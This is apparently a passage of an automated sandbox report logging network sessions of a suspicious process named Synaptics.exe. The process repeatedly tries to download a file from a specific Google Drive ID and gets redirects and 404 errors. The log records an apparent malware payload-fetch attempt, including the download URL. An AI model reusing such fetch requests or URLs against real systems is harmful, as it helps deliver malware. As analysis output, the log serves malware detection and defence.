                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.449785142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.449786142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.449787142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:27 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:26 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VjbZc3SevKi6pUwah1X9kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.449795142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4-zQ8CE_aZEzsR8NJ7xj1XwihvuRYoswtbwgvUOLG9sYBAFObal_K9U0nrye83Iiax
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vU70lNuHQHCX6pe4HILN1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 57 34 5f 63 68 5a 31 31 6e 6f 49 53 4a 49 77 73 59 48 4b 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="HW4_chZ11noISJIwsYHKZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.449794142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:29 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7yNNFA905L8ELR7XnDMInO6kv1kts9PYnMKUZmMbQxZzEyqWHDn-mdqs3Ulnh3vsl3MjIgC_8
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-U6geAeSX1Qtc8dYY0KrEKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 57 71 54 30 76 4a 73 50 4c 70 36 39 74 46 59 4f 54 65 57 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="oWqT0vJsPLp69tFYOTeWeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.449796142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:29 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-R-BsY63R_cnnFYinoAREjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.449797142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:29 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-m3NU176D49aC2iGLV3DbNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.449807142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:34 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:33 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-efYs8UfOffW9sGqlYwrXLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.449808142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:34 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:33 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7JcGOyMUxfsATLoOfu-7-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.449812142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:36 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GJ15AytQnd2zTl3QSD5fbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.449813142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4pKyjdqt4DzAwuz2ckpNDPo_jMB6XfH4kT_PMUHhNVAQ9LIe-hbRn0uGNs2rwUVeefHDMRBaE
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tZihVc4qzydeDx-Gv_6Xbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
